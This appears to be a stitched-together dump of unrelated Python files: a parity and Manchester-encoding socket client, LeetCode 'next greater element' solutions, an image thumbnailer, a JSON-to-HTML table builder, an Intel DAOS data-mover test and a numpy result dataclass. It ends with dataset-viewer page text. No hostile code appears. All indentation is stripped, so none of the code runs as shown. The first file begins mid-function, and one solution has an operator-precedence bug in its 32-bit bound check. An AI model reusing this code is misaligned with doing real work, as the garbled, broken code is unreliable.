count_1 = 0
for i in range(rows):
col = []
count = 0
for j in range(cols):
if(bitStream[k] == "1"):
count_1 = count_1 + 1
col.append(bitStream[k])
k = k + 1
if(j == 7):
if(count_1 % 2 == 0):
col.append(0)
else:
col.append(1)
arr.append(col)
col = []
for j in range(cols):
count_2 = 0
for i in range(rows):
if(arr[i][j] == "1"):
count_2 = count_2 + 1
if(i == n-1):
if(count_2 % 2 == 0):
col.append(0)
else:
col.append(1)
arr.append(col)
count_3 = 0
for i in range(cols):
if(arr[int(n)][i] == 1):
count_3 = count_3 + 1
if(i == cols-1):
if(count_3 % 2 == 0):
arr[int(n)].append(0)
else:
arr[int(n)].append(1)
fileOpen = open("2DParity.txt","w")
for i in range(int(n)+1):
for j in range(9):
fileOpen.write(str(arr[i][j]))
fileOpen.close()
s = socket.socket()
host = socket.gethostname()
port = 22122
s.connect((host,port))
print("Considering bit stream from ""inputBitStream.txt"" file")
fileOpen_1 = open("inputBitStream.txt", "r")
bitStream = fileOpen_1.read()
fileOpen_1.close()
print("Input bit stream is - ", bitStream)
print()
#sending server the length of original data
lengthOfOriginalData = str(len(bitStream))
s.send(lengthOfOriginalData.encode())
#add 2D parity
print("Added 2D parity with the bit stream and saved it in ""2DParity.txt"" file")
parityCheck(bitStream)
fileOpen_2 = open("2DParity.txt","r")
parityBitStream = fileOpen_2.read()
fileOpen_2.close()
print("Bit stream after adding 2D parity is: " + parityBitStream)
print()
#encode
print("Encoding the 2D parity bit stream given in ""2DParity.txt"" file according to Manchester Scheme")
encodedVoltageStream = encode(parityBitStream)
print("Manchester Encoded Bit Stream is:")
print(encodedVoltageStream)
fileOpen_3 = open("encodedBitStream.txt","w")
fileOpen_3.write(encodedVoltageStream)
fileOpen_3.close()
print("Manchester Encoded Bit Stream is saved in ""encodedBitStream.txt"" file")
print()
#send it to server
print("Sending the valid Manchester Encoded Bit Stream to Server")
print()
s.send(encodedVoltageStream.encode())
#errorInserted
print("Inserting an error voltage level to the valid encoded bit stream")
errorVoltageStream = errorInserted(encodedVoltageStream)
print("Error Encoded Bit Stream is: ")
print(errorVoltageStream)
fileOpen_4 = open("errorVoltageStream.txt","w")
fileOpen_4.write(errorVoltageStream)
fileOpen_4.close()
print("Error Encoded Bit Stream is saved in ""errorVoltageStream.txt"" file")
print()
#send it to server
print("Sending the Invalid Encoded Bit Stream to Server")
print()
s.send(errorVoltageStream.encode())
print("Server says: " + s.recv(1024).decode())
s.close() |
class Solution:
def nextGreaterElement(self, n: int) -> int:
seq = list(str(n))
N = len(seq)
if N < 2:
return -1
i = N - 2
while seq[i] >= seq[i+1]:
i -= 1
if i < 0:
return -1
j = N - 1
while seq[i] >= seq[j]:
j -= 1
seq[i], seq[j] = seq[j], seq[i]
seq[i+1:] = reversed(seq[i+1:])
ret = int("".join(seq))
if ret <= 1 << 31 - 1:
return ret
else:
return -1
def nextGreaterElement_sort(self, n: int) -> int:
seq = [int(e) for e in str(n)]
stk = []
for i in range(len(seq) - 1, -1 , -1):
e = seq[i]
popped = None
while stk and seq[stk[-1]] > e:
popped = stk.pop()
if popped:
seq[i], seq[popped] = seq[popped], seq[i]
seq[i+1:] = sorted(seq[i+1:])
ret = int("".join(map(str, seq)))
if ret <= 1 << 31 - 1:
return ret
else:
return -1
stk.append(i)
return -1
if __name__ == "__main__":
assert Solution().nextGreaterElement(12) == 21
|
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 1 15:04:03 2018
@author: Administrator
"""
from PIL import Image
import glob, os
size = 128, 128
for infile in glob.glob("*.jpg"):
file, ext = os.path.splitext(infile)
im = Image.open(infile)
im.thumbnail(size)
im.save(file + ".thumbnail", "JPEG") |
import json
data = json.load(open('table.json', 'r'))
keys = list(data.keys())
second_level = [data[k].keys() for k in keys]
for l in second_level:
assert l == second_level[0]
table = '<div style="display: flex; justify-content: center;">\n<table class="styled-table">\n'
table += f'<thead>\n<tr>\n<th>Estrategias</th>\n'
for k in keys:
table += f'<th>{k}</th>\n'
table += '</tr>\n</thead>\n<tbody>\n'
for sk in second_level[0]:
table += f'<tr>\n<th>{sk}</th>\n'
for k in keys:
table += f'<td>{data[k][sk]} %</td>\n'
table += '</tr>'
table += '</tbody>\n</table>\n</div>\n'
open('table.html', 'w').write(table)
|
"""
(C) Copyright 2020-2023 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
from os.path import join
from data_mover_test_base import DataMoverTestBase
from exception_utils import CommandFailure
class DmvrPosixMetaEntry(DataMoverTestBase):
# pylint: disable=too-many-ancestors
"""Test class for POSIX DataMover entry metadata validation.
Test Class Description:
Tests metadata preservation on POSIX entries.
I.e. files, directories, symlinks.
:avocado: recursive
"""
def test_dm_posix_meta_entry_dcp(self):
"""JIRA id: DAOS-6390
Test Description:
Verifies that POSIX metadata is preserved for dcp.
:avocado: tags=all,full_regression
:avocado: tags=vm
:avocado: tags=datamover,mfu,mfu_dcp,dfs,dfuse
:avocado: tags=dm_posix_meta_entry,dm_posix_meta_entry_dcp
:avocado: tags=DmvrPosixMetaEntry,test_dm_posix_meta_entry_dcp
"""
self.run_dm_posix_meta_entry("DCP")
def run_dm_posix_meta_entry(self, tool):
"""Run the test on a given tool.
Use Cases:
Create pool1.
Create cont1 and cont2 in pool1.
Create a source directory in cont1 that contains:
1 directory, 1 file, 1 symlink.
xattrs on the directory and file.
Create a similar source directory in an external POSIX file system.
Copy the DAOS source to another DAOS directory.
Copy the DAOS source to an external POSIX file system.
Copy the POSIX source to another DAOS directory.
For each case, verify that permissions and owners are preserved.
Repeat each case, but with the --preserve flag.
For each case, verify that xattrs and timestamps are preserved.
Args:
tool (str): The DataMover tool to run the test with.
Must be a valid tool in self.TOOLS.
"""
# Set the tool to use
self.set_tool(tool)
# Get preserve level
preserve_on = self.params.get("preserve", "/run/{}/*".format(self.tool.lower()))
test_desc = self.test_id + " (preserve={})".format(str(preserve_on))
# Start dfuse to hold all pools/containers
self.start_dfuse(self.dfuse_hosts)
# Create 1 pool
pool1 = self.create_pool()
# Create 1 source container with test data
cont1 = self.get_container(pool1)
daos_src_path = self.new_daos_test_path(False)
dfuse_src_path = "{}/{}/{}{}".format(
self.dfuse.mount_dir.value, pool1.uuid, cont1.uuid, daos_src_path)
self.create_data(dfuse_src_path)
# Create 1 source posix path with test data
posix_src_path = self.new_posix_test_path(parent=self.workdir)
self.create_data(posix_src_path)
# Run each variation with and without the --preserve option
# For each case, create a new destination directory.
# For DAOS, cont1 is used as the source and destination.
# DAOS -> DAOS
daos_dst_path = self.new_daos_test_path(False)
dfuse_dst_path = "{}/{}/{}{}".format(
self.dfuse.mount_dir.value, pool1.uuid, cont1.uuid, daos_dst_path)
self.run_datamover(
test_desc + "(DAOS->DAOS)",
"DAOS", daos_src_path, pool1, cont1,
"DAOS", daos_dst_path, pool1, cont1)
self.compare_data(dfuse_src_path, dfuse_dst_path,
cmp_times=preserve_on, cmp_xattr=preserve_on)
# DAOS -> POSIX
posix_dst_path = self.new_posix_test_path(create=False, parent=self.workdir)
self.run_datamover(
test_desc + "(DAOS->POSIX)",
"DAOS", daos_src_path, pool1, cont1,
"POSIX", posix_dst_path)
self.compare_data(
dfuse_src_path, posix_dst_path,
cmp_times=preserve_on, cmp_xattr=preserve_on)
# POSIX -> DAOS
daos_dst_path = self.new_daos_test_path(False)
dfuse_dst_path = "{}/{}/{}{}".format(
self.dfuse.mount_dir.value, pool1.uuid, cont1.uuid, daos_dst_path)
self.run_datamover(
test_desc + "(POSIX->DAOS)",
"POSIX", posix_src_path, None, None,
"DAOS", daos_dst_path, pool1, cont1)
self.compare_data(
posix_src_path, dfuse_dst_path,
cmp_times=preserve_on, cmp_xattr=preserve_on)
def create_data(self, path):
"""Create the test data.
Args:
path (str): Where to create the data.
"""
cmd_list = [
# One directory
"mkdir -p '{}'".format(join(path, "dir1")),
"pushd '{}'".format(path),
# xattrs for the directory
"setfattr -n 'user.dir1_attr1' -v 'dir1_value1' 'dir1'",
"setfattr -n 'user.dir1_attr2' -v 'dir1_value2' 'dir1'",
# One file in the directory
"echo 'test_data' > 'dir1/file1'",
# xattrs for the file
"setfattr -n 'user.file1_attr1' -v 'file1_value1' 'dir1/file1'",
"setfattr -n 'user.file1_attr2' -v 'file1_value2' 'dir1/file1'",
# One symlink in the directory
"ln -s 'file1' 'dir1/link1'",
"popd"
]
self.execute_cmd_list(cmd_list)
def compare_data(self, path1, path2, cmp_filetype=True,
cmp_perms=True, cmp_owner=True, cmp_times=False,
cmp_xattr=False):
"""Compare the test data.
Args:
path1 (str): The left-hand side to compare.
path2 (str): The right-hand side to compare.
cmp_filetype (bool, optional): Whether to compare the file-type.
Default is True.
cmp_perms (bool, optional): Whether to compare the permissions.
Default is True.
cmp_owner (bool, optional): Whether to compare the user and group
ownership. Default is True.
cmp_times (bool, optional): Whether to compare mtime.
Default is False.
cmp_xattr (bool, optional): Whether to compare xattrs.
Default is False.
"""
self.log.info("compare_data('%s', '%s')", path1, path2)
# Generate the fields to compare
field_printf = ""
if cmp_filetype:
field_printf += "File Type: %F\\n"
if cmp_perms:
field_printf += "Permissions: %A\\n"
if cmp_owner:
field_printf += "Group Name: %G\\n"
field_printf += "User Name: %U\\n"
if cmp_times:
field_printf += "mtime: %Y\\n"
# Diff the fields for each entry
for entry in ["dir1", "dir1/file1", "dir1/link1"]:
entry1 = join(path1, entry)
entry2 = join(path2, entry)
if field_printf:
# Use stat to get perms, etc.
stat_cmd1 = "stat --printf '{}' '{}'".format(
field_printf, entry1)
stat_cmd2 = "stat --printf '{}' '{}'".format(
field_printf, entry2)
diff_cmd = "diff <({} 2>&1) <({} 2>&1)".format(
stat_cmd1, stat_cmd2)
result = self.execute_cmd(diff_cmd, fail_on_err=False)
if 0 not in result or len(result) > 1:
hosts = [str(nodes) for code, nodes in list(result.items()) if code != 0]
raise CommandFailure(
"Command to check files failed '{}' on {}".format(diff_cmd, hosts))
if cmp_xattr:
# Use getfattr to get the xattrs
xattr_cmd1 = "getfattr -d -h '{}'".format(entry1)
xattr_cmd2 = "getfattr -d -h '{}'".format(entry2)
diff_cmd = "diff -I '^#' <({} 2>&1) <({} 2>&1)".format(
xattr_cmd1, xattr_cmd2)
self.execute_cmd(diff_cmd)
def execute_cmd_list(self, cmd_list):
"""Execute a list of commands, separated by &&.
Args:
cmd_list (list): A list of commands to execute.
"""
cmd = " &&\n".join(cmd_list)
self.execute_cmd(cmd)
|
from dataclasses import dataclass,field
import numpy as np
from ..header_utils import get_last_keyword
@dataclass
class Result(object):
method: str=''
x: np.ndarray=field(default = np.zeros(0))
istop: int=-1
itn: int=0
r1norm: float=0.0
r2norm: float=0.0
anorm: float=0.0
acond: float=0.0
arnorm: float=0.0
xnorm: float=0.0
lo: np.ndarray=field(default = np.zeros(0))
hi: np.ndarray=field(default = np.zeros(0))
damp: float=1.0
@property
def logdamp(self):
return np.log10(self.damp)
@property
def xy(self):
return np.log10(self.r1norm),np.log10(self.xnorm)
def update_header(self,hdr,after=None):
#*other,last=hdr.keys() # get the last keyword
last=get_last_keyword(hdr)
hdr.set('INVERTER',value=self.method,after=last,
comment='method for inversion')
hdr.set('ACOND',value=self.acond,after='INVERTER',
comment='Condition of the matrix')
hdr.set('ANORM',value=self.anorm,after='ACOND',
comment='norm of matrix')
hdr.set('ARNORM',value=self.arnorm,after='ANORM',
comment='norm of matrix')
hdr.set('R1NORM',value=self.r1norm,after='ARNORM',
comment='chi2')
hdr.set('R2NORM',value=self.r2norm,after='R1NORM',
comment='norm of damped chi2')
hdr.set('XNORM',value=self.xnorm,after='R2NORM',
comment='norm of x')
hdr.set('ISTOP',value=self.istop,after='XNORM',
comment='stopping condition')
hdr.set('ITER',value=self.itn,after='ISTOP',
comment='number of iterations')
hdr.set('',value='',before='INVERTER')
hdr.set('',value=' / Linear Results',before='INVERTER')
hdr.set('',value='',before='INVERTER')
if __name__=='__main__':
#n=10
#r=(np.arange(n),1,24,2.3,25.,12.,100000.,456.,123.,np.arange(n)+2)
#x=Result(*r,r[-1].copy(),43.)
x=Result('kjdk')
print(x.method)
#print(x.logdamp)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.